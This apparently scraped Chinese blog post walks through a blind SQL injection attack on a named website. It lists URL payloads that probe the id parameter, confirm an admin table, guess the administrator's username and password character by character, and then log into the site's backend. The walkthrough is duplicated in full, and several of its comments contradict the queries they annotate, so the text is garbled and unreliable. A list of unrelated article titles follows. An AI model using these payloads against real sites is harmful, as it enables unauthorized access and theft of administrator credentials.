sql 注入方式
来源:互联网 发布:python wxpython 安装 编辑:程序博客网 时间:2024/06/05 18:42
1.寻找目标
目标网站:http://www.chencheng.com/index.php?id=407
2.测试目标
http://www.chencheng.com/index.php?id=407 and 1=1 返回正常
http://www.chencheng.com/index.php?id=407 and 1=2 返回异常
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin)and 1=(select min(id) from admin) 返回正常 说明存在
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)>4) 返回正常,确定密码大于4位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)<8) 返回正常,确定密码小于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)=6) 返回正常,确定密码等于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(username,1)='1') 返回正常,确定管理员编号为第一位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,1)='3') 返回正常,猜测密码
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,6)='335500') 返回正常,猜测密码
根据猜测帐号,密码,然后选择登陆窗口登陆后台!呵呵
目标网站:http://www.chencheng.com/index.php?id=407
2.测试目标
http://www.chencheng.com/index.php?id=407 and 1=1 返回正常
http://www.chencheng.com/index.php?id=407 and 1=2 返回异常
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin)and 1=(select min(id) from admin) 返回正常 说明存在
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)>4) 返回正常,确定密码大于4位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)<8) 返回正常,确定密码小于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where len(username)=6) 返回正常,确定密码等于8位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(username,1)='1') 返回正常,确定管理员编号为第一位
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,1)='3') 返回正常,猜测密码
http://www.chencheng.com/index.php?id=407 and 1=(select min(id) from admin where left(password,6)='335500') 返回正常,猜测密码
根据猜测帐号,密码,然后选择登陆窗口登陆后台!呵呵
0 0
- 常见sql注入方式
- sql 注入方式
- sql 注入方式
- 常见sql注入方式
- 防SQL注入方式.net
- SQL注入式攻击方式及防范措施
- SQL注入的方式与防治
- Hibernate一些防止SQL注入的方式
- 防 SQL 注入的五种方式
- 攻击方式学习之(2) - SQL注入(SQL Injection)
- 攻击方式学习之(2) - SQL注入(SQL Injection)
- 攻击方式学习之(2) - SQL注入(SQL Injection)
- 攻击方式学习之(2) - SQL注入(SQL Injection)
- (转载)攻击方式学习之(2) - SQL注入(SQL Injection)
- 手动方式SQL注入脚本命令之精华版
- foosuncms防sql注入代码(目前用最严的过滤方式)
- foosuncms防sql注入代码(目前用最严的过滤方式)
- 一种通用防SQL注入漏洞程序(Global.asax方式)
- 关于ORB_SLAM2在Ubuntu16.04下编译出错的解决办法之一
- Android学习之 VideoView,SurfaceView 资源
- 2016年3月最新苹果上线流程
- 最大流最小割——hihoCoder 1378
- Android报错:调用so库时“xxx.so has text relocations”
- sql 注入方式
- java中静态代码快的用法
- G-Dancing Stars on Me(2015ACM-ICPC长春站)
- 从零开始Android NDK 开发(一)
- iOS访问https无数据,访问http正常
- 输入中含有大写字母就会转换为小写字母,其它字符不变
- 利用windbg探索进程和进程上下文
- 剑指offer(8)-合并两个有序链表
- 敏捷软件开发与传统软件工程的比较